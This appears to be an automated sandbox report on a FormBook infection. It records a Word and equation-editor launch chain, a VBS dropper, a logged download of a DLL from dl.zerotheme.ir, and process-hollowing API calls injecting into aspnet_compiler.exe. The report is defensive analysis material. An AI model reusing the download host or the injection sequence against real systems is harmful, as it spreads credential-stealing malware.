                                              Data Ascii: U(ABO,p*0qVJeo>4d/q'$cMNwd_02V["V],4HTItp(s;'QY&3x$cKPdx.v]_b(a[m.~UExw>A7%6FeFX0y=V ^n|Q[ H
                                              2024-09-27 08:57:08 UTC16384INData Raw: 33 2f 6e 25 42 80 db eb 74 b0 ae 6e 26 a9 c6 ea e2 85 af 3a 87 fd 9d a6 a9 04 f1 2e 0b ad 57 c3 43 36 bd f7 29 dc 71 b0 de 93 c0 86 6a 0f 09 4d 29 27 95 c2 80 49 7c 65 1e 4e cc a0 69 20 b9 50 27 b8 88 a8 4b d1 3b c0 82 23 f2 0d 66 c7 6a cd ed 45 9f 90 88 9a 2b 45 50 4c 33 a1 05 33 fe 95 9e 19 37 38 1a 54 45 ad 34 c0 38 0b 87 4f fd 6b 41 20 90 31 42 b0 34 e9 91 89 66 3f bb 41 23 8d 3f b3 0c 55 c6 c2 fd 4d 20 ba 15 a7 df ec 89 ff 94 d9 f3 21 cf e1 ce 78 87 ef 22 01 de 5f 17 a7 f4 98 2b 00 99 1a 37 91 07 dc 79 51 20 ef 8d 16 57 9c 28 ce e3 4d 42 f6 5d 46 7d ad d0 68 17 61 c9 7b f2 4d 02 83 d5 22 8e 7e 32 4a 01 49 a5 3a 2b 3b ee 3f 03 12 00 7d 2a 5a f4 0e 0e ab 58 88 43 1c 15 0e f2 2b 2c ec 36 a5 c2 f9 e7 79 e9 65 fd 2c 9a f9 b8 7f be f8 f0 00 a8 29 c6 a7 b5
                                              Data Ascii: 3/n%Btn&:.WC6)qjM)'I|eNi P'K;#fjE+EPL3378TE48OkA 1B4f?A#?UM !x"_+7yQ W(MB]F}ha{M"~2JI:+;?}*ZXC+,6ye,)
                                              2024-09-27 08:57:08 UTC16384INData Raw: 06 39 e1 22 dd ed b8 ec fa 8b 9f 87 74 42 83 ad a7 3a 6e b0 5a 9f e8 60 a0 2c 57 07 ad d0 31 94 82 15 8a 3e d8 09 b3 a1 2e 55 81 cb 51 c8 fe 48 92 4b bb 3e 4d 35 8f dd e5 3e 33 bd 51 25 15 db c3 60 20 27 4d f3 9e 3b 8a 2b ba ff ff 21 0d 56 48 1c 36 fc 70 d1 46 ff 40 b6 51 54 95 d9 74 78 0f 12 4c a4 cd 08 53 55 00 b4 ce 41 22 86 02 de 5c a4 74 d8 a8 89 e3 bf b5 77 04 00 a7 0a 0e 6a 8d bd fa b6 02 e2 79 e5 c7 04 3c ba 38 ee 54 35 31 b1 72 20 f9 41 3e f4 69 12 c4 73 e8 e9 f3 78 28 a5 63 fc 92 4e 1e fb f1 a8 ab a8 b2 da 4c 0a 45 42 c1 64 88 0c 5a 37 1b 37 08 1a 33 2f 8d 19 d4 d5 f0 eb c0 83 4a 3f 6d b9 cc ab c7 2f a5 6a 3c e9 33 47 f3 d8 76 d9 cf 4d 40 e6 bd b9 7e a2 22 bf 9f 4a fe 84 e9 6f e1 ad 61 03 b2 90 8f 0a f1 fa d2 3d e1 8d 47 e4 45 d9 8c 28 71 57 50
                                              Data Ascii: 9"tB:nZ`,W1>.UQHK>M5>3Q%` 'M;+!VH6pF@QTtxLSUA"\twjy<8T51r A>isx(cNLEBdZ773/J?m/j<3GvM@~"Joa=GE(qWP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49167 | 185.18.213.20 | 443 | 3584 | C:\Users\user\AppData\Local\Temp\temp_executable.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:57:09 UTC | 66 | OUT | GET /kokorila/cgl-bin/DLLL.dll HTTP/1.1
Host: dl.zerotheme.ir
2024-09-27 08:57:09 UTC | 206 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Thu, 26 Sep 2024 04:42:14 GMT
accept-ranges: bytes
content-length: 15360
date: Fri, 27 Sep 2024 08:57:09 GMT



                                              Target ID:0
                                              Start time:04:56:57
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13f280000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:2
                                              Start time:04:56:59
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:04:57:02
                                              Start date:27/09/2024
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
                                              Imagebase:0x450000
                                              File size:141'824 bytes
                                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:04:57:04
                                              Start date:27/09/2024
                                              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                                              Imagebase:0xa80000
                                              File size:49'152 bytes
                                              MD5 hash:3E01AC27E853080CA5C92470DF3F738C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 21%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:04:57:09
                                              Start date:27/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                              Imagebase:0x20000
                                              File size:55'384 bytes
                                              MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:8
                                              Start time:04:57:21
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0056F000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_56f000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: y$y$y$y$y$y$y$y$y$y$y$y$y1n$yN$yY$y\$y\
                                                • API String ID: 0-1649628219
                                                • Opcode ID: 48bc06a2e6a1c9d82b5de89cc9cc5c4e775dd96478d983fa0f86de395adcf2bf
                                                • Instruction ID: 98a7b27af87fecd57121f49a38937c7a13ecba67703ba66a7a48adb0dbd96ec3
                                                • Opcode Fuzzy Hash: 48bc06a2e6a1c9d82b5de89cc9cc5c4e775dd96478d983fa0f86de395adcf2bf
                                                • Instruction Fuzzy Hash: AAD1DB6144E3C4AFD3138B386CB99963FB45E53218B0A01DBD8D48F6B3E649091AC7B7

                                                Execution Graph

                                                Execution Coverage:21.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:17
                                                Total number of Limit Nodes:2
                                                Execution graph API nodes: VirtualAllocEx, ResumeThread, ReadProcessMemory, WriteProcessMemory, CreateProcessW, Wow64SetThreadContext

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p!p
                                                • API String ID: 0-1147775804
                                                • Opcode ID: c5b505e7e8a1eeb1706267d6bca91261db06ebac81c6c10c36eaccc83a8567c7
                                                • Instruction ID: 86cdc2fa27492a2e183c480f0275e2fa089e021d9eb7d635b1244d5ef82ffc7e
                                                • Opcode Fuzzy Hash: c5b505e7e8a1eeb1706267d6bca91261db06ebac81c6c10c36eaccc83a8567c7
                                                • Instruction Fuzzy Hash: FB02D375A00218DFDB15DFA9C984E9DBBB2FF49300F1581A9E509AB232DB31E991DF10

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d8d18b5976bc39ac8da2c95d23bf03fa17eb285549429a23d1b92c2cae817a3
                                                • Instruction ID: b4bce30e8b23ed29a1bb676a9b4aaeb0045c5e3d23129fe30da577ae05da73cf
                                                • Opcode Fuzzy Hash: 7d8d18b5976bc39ac8da2c95d23bf03fa17eb285549429a23d1b92c2cae817a3
                                                • Instruction Fuzzy Hash: BFB2AC74A052288FDB65EF68D894BDDBBB5AF49300F1085EAE50CA7291DB349F84CF50

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01ef9bc24e5b1225e7dbd4f4d57684b15a77d2dd90622b1df814a27efeca27dc
                                                • Instruction ID: 38ed2278f1746b7661b50a252702d6bd3b87a027285d69d570e80e5e75b20c3d
                                                • Opcode Fuzzy Hash: 01ef9bc24e5b1225e7dbd4f4d57684b15a77d2dd90622b1df814a27efeca27dc
                                                • Instruction Fuzzy Hash: DF429474A012188FDB64DF69D994B9DBBF1BF49300F1181EAE909A73A1DB309E85CF50
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22ee887541ab07b21c5e82c7d1e7e4a3a6f333e18da61addc1f6b8456f799636
                                                • Instruction ID: 63d84b5dfda9de953663f8bf5387f00bcefeb260cf4946b2f3696455628424db
                                                • Opcode Fuzzy Hash: 22ee887541ab07b21c5e82c7d1e7e4a3a6f333e18da61addc1f6b8456f799636
                                                • Instruction Fuzzy Hash: 7232A374E04229CFDB65DF69DD44B9DBBB2BB59300F1091AAE809A76A0DB305E85CF10

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00188A9F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 4aad0d33fca0b68c7b747bf72cfd20e9c3e630f10d587b4cdc912f55991b24a1
                                                • Instruction ID: c65f8cbedd52a8c5057284fe4d9b9aadd99197d564ecb95bdeaa5169310ea7e0
                                                • Opcode Fuzzy Hash: 4aad0d33fca0b68c7b747bf72cfd20e9c3e630f10d587b4cdc912f55991b24a1
                                                • Instruction Fuzzy Hash: 3381D0B4D002698FDF25CFA5C840BEDBBB1AF4A304F0491AAE549B7260DB709A85DF54

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00188A9F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 0679d2e9a441590388f3db04352e2a3c25434937d8c0eec4a01ff2ba7580425f
                                                • Instruction ID: 2b820b6e21d8ee6f8aef19b3dcfa33027c48544392bb266c31026361e8fd7776
                                                • Opcode Fuzzy Hash: 0679d2e9a441590388f3db04352e2a3c25434937d8c0eec4a01ff2ba7580425f
                                                • Instruction Fuzzy Hash: F381D0B4D0022DDFDF25CFA5C840BDDBBB1AB4A304F0491AAE549B7250DB709A89DF94

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0018903E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 1ddc1f23d1b5507149332310cbb9050574bd7f942b1c1ea044ae3d87b16d3ef3
                                                • Instruction ID: a59fb84a69b00d88b8f469e8b9f5b6d0fffb1a2d4876387f85ab8a7d7e043ba8
                                                • Opcode Fuzzy Hash: 1ddc1f23d1b5507149332310cbb9050574bd7f942b1c1ea044ae3d87b16d3ef3
                                                • Instruction Fuzzy Hash: 1E419CB5D052589FCF10CFA9D984ADEFBF1BB59310F24902AE818BB210D374AA45CF64

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0018903E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 3941c16e4a6b422d8f08486d47e904e6ef1cd179dc2c0032755972e57106dd41
                                                • Instruction ID: a3c9db3832965caad3fd82faf9eb0e758272f923aafd3ea2ae1497db021cba92
                                                • Opcode Fuzzy Hash: 3941c16e4a6b422d8f08486d47e904e6ef1cd179dc2c0032755972e57106dd41
                                                • Instruction Fuzzy Hash: 334169B5D002589FCF10CFA9D984ADEFBF5BB49314F24902AE918BB210D375AA45CF64

                                                Control-flow Graph

                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00188DFD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 3767bc356ae3bec7cff0ea2cad5caddadd06f814856737cff42505796102ef99
                                                • Instruction ID: cc649f11ba2f858996112393d05b452b15ebc37ab9203f3eb67d66fd4c1bb051
                                                • Opcode Fuzzy Hash: 3767bc356ae3bec7cff0ea2cad5caddadd06f814856737cff42505796102ef99
                                                • Instruction Fuzzy Hash: BC4198B9D01258DFCF10CFAAD984ADEFBB5BB59310F10902AE814B7210D334AA45CF65

                                                Control-flow Graph
                                                • Rendered graph omitted; basic blocks 188d50-188e54, calling ReadProcessMemory
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00188DFD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: a0f7326fbe16f93696311698a6c9863a9f97a10414d896687be3ff89e7e2780a
                                                • Instruction ID: dd5d05920d387998e48f195e2633ef183e2539cd436b6060b911ed379e905e94
                                                • Opcode Fuzzy Hash: a0f7326fbe16f93696311698a6c9863a9f97a10414d896687be3ff89e7e2780a
                                                • Instruction Fuzzy Hash: 613178B9D00258DFCF10CFAAD984ADEFBB1BB59310F10902AE814B7210D335AA45CF65

                                                Control-flow Graph
                                                • Rendered graph omitted; basic blocks 188e61-188f5c, calling VirtualAllocEx
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00188F0D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4885a1551c145cac8bbf2bcc2e4e190f129bfa1bdef4531c3003942b78a9e991
                                                • Instruction ID: 2d1dfb7310ba53148f5c82800060ad8ac4b40651e4655fca2d87fbd4f22b2ff5
                                                • Opcode Fuzzy Hash: 4885a1551c145cac8bbf2bcc2e4e190f129bfa1bdef4531c3003942b78a9e991
                                                • Instruction Fuzzy Hash: E53187B9D04258DFCF10CFA9D984ADEFBB1AB59310F14902AE814BB310D334A905CF65

                                                Control-flow Graph
                                                • Rendered graph omitted; basic blocks 188e68-188f5c, calling VirtualAllocEx
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00188F0D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 93ab4388d03a3cc7b3dcfbb1c7ca0da2186fc7e265098fb120829a4b231814ec
                                                • Instruction ID: 8b99047dd754bff6c08e14486d7b5756fedae747d6678a317549891e2806acbc
                                                • Opcode Fuzzy Hash: 93ab4388d03a3cc7b3dcfbb1c7ca0da2186fc7e265098fb120829a4b231814ec
                                                • Instruction Fuzzy Hash: 553156B9D04258DFCF10CFA9D984ADEFBB5AB59310F20902AE914B7310D335A945CF65

                                                Control-flow Graph
                                                • Rendered graph omitted; basic blocks 188c38-188d3b, calling Wow64SetThreadContext
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00188CEA
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 9244d7c34c31d439e1f7065ee7edb1f826c78dde4c355b4b890236aa3ef27f2a
                                                • Instruction ID: 06f216ec6057ef925655a02fb0d127ac5993d5de9fde20d61bd4d69c8415acc1
                                                • Opcode Fuzzy Hash: 9244d7c34c31d439e1f7065ee7edb1f826c78dde4c355b4b890236aa3ef27f2a
                                                • Instruction Fuzzy Hash: 7C31ACB5D012589FCB10CFAAD984ADEFBF1BB49314F24806AE414BB350C778AA45CF64

                                                Control-flow Graph
                                                • Rendered graph omitted; basic blocks 188c40-188d3b, calling Wow64SetThreadContext
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00188CEA
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: fc222ef21be8119daa1d7fdbfa9b334befc39e77924bb43fa6784816a250ee1b
                                                • Instruction ID: cf4add4b5ea6a8f07c150e37ea81db85e53ec83996af6f83b064fd08c59c366a
                                                • Opcode Fuzzy Hash: fc222ef21be8119daa1d7fdbfa9b334befc39e77924bb43fa6784816a250ee1b
                                                • Instruction Fuzzy Hash: 13319AB5D012589FCB10CFAAD984ADEFBF1BB49314F24802AE414B7350D778AA45CFA4

                                                Control-flow Graph
                                                • Rendered graph omitted; basic blocks 1890a9-18916d, calling ResumeThread
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 0eb03105ffb5b67b6a4a7b2e1744bcda8abff8c5602a4448a1ff7c93dcaa947b
                                                • Instruction ID: 3e9290d2513327e3f54f7c1fe58afcfdef2cee43558465df1b5309b55b472a6c
                                                • Opcode Fuzzy Hash: 0eb03105ffb5b67b6a4a7b2e1744bcda8abff8c5602a4448a1ff7c93dcaa947b
                                                • Instruction Fuzzy Hash: 1521AAB5D042099FCF10CFA9D588ADEFBF0AB49360F24906AE818B7310D334A945CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 171 1890b0-189136 ResumeThread 172 189138-18913e 171->172 173 18913f-18916d 171->173 172->173
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 2d6fac2fa40bd17901749a08234753fe6eac5f213e54029ad41702a5222b7bb2
                                                • Instruction ID: b460de28a7b8a5c631a39cb9bb4cab8f41385c619c3fa6df8180bfc473644732
                                                • Opcode Fuzzy Hash: 2d6fac2fa40bd17901749a08234753fe6eac5f213e54029ad41702a5222b7bb2
                                                • Instruction Fuzzy Hash: BC218AB4D042099FCF10CFA9D588ADEFBF4AB49360F24906AE818B7310D375A945CFA5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6de8b391b3e4af277308d3904cbddc4dcdaa5fa9f496c17a1eabe107fce37211
                                                • Instruction ID: e8e17c3e583a24bbcdb5cb5597cf6ac5ce5a0c6d1939d662df032dd9bb6c5420
                                                • Opcode Fuzzy Hash: 6de8b391b3e4af277308d3904cbddc4dcdaa5fa9f496c17a1eabe107fce37211
                                                • Instruction Fuzzy Hash: E201EC7490A388AFC742DFA8D854A9DBFB0EF4A300F1580DAE844D7262D2349E58DB52
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b33a8011f6e2c987f7fc33cc1e7616dc3020c6f0337f6047ef5e0321c7bd41d
                                                • Instruction ID: d5b01e1b8a718432618333dcb78b041fd57d7764a75350b42936153a720a051b
                                                • Opcode Fuzzy Hash: 1b33a8011f6e2c987f7fc33cc1e7616dc3020c6f0337f6047ef5e0321c7bd41d
                                                • Instruction Fuzzy Hash: 02F0F43080E3C89FC7039BB4982069C7FB0AF47201B1941EBC484DB2A3D2389E49DB62
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b119cd23a6f26f3602107f3dcd0489f6d455307c8d201dd9aa0a7aa9cc2a26c
                                                • Instruction ID: bb36e0b72be410b2ff85e79151a1911eaa3e0b5453e57122e05ee74cd2317cd6
                                                • Opcode Fuzzy Hash: 5b119cd23a6f26f3602107f3dcd0489f6d455307c8d201dd9aa0a7aa9cc2a26c
                                                • Instruction Fuzzy Hash: 90F0177480E3C49FC303DBB4A864A487FB4AF0B200F1A41DBD484DB2A3D6389948CB62
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af2cf73c767c2dbea77148076bf4e4367dd616c89db7e4a9f4f125aeeb29acc6
                                                • Instruction ID: e642fbaa4b643c553d83326b50738ae29da55d2dc62585fac38549907052270a
                                                • Opcode Fuzzy Hash: af2cf73c767c2dbea77148076bf4e4367dd616c89db7e4a9f4f125aeeb29acc6
                                                • Instruction Fuzzy Hash: 9DF0B770D0A3849FCB53DB78986568DBFB0EF1B204B1541EFC454DB263D2754A49CB52
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6720e88a9169cfaf5dc0a2d20dbaa75acc6992ffda729ef2e8d3c17d737db1c5
                                                • Instruction ID: d04a43ba28e79ebc4faeab5792a7aad30b5830e7f5823506d8a3de833cd6fafc
                                                • Opcode Fuzzy Hash: 6720e88a9169cfaf5dc0a2d20dbaa75acc6992ffda729ef2e8d3c17d737db1c5
                                                • Instruction Fuzzy Hash: 06F01C3050A388DFC302DBB4EC65A9D7BB8AF07200B5604DAD044DB2A3DA396E49C765
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6b2e23a1e1449610c7684dc70ac6803ec0cd41d76c1b6ff95f1e004b185491b
                                                • Instruction ID: 29a2b61e23fca6525f6418644428d6b55103f59c9df633428aaca211218e2cc1
                                                • Opcode Fuzzy Hash: f6b2e23a1e1449610c7684dc70ac6803ec0cd41d76c1b6ff95f1e004b185491b
                                                • Instruction Fuzzy Hash: 9BF0856040A3C69FC717DB748824A4EBFB0AB43200B5901EE9089EB2E3C7340E06CB62
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
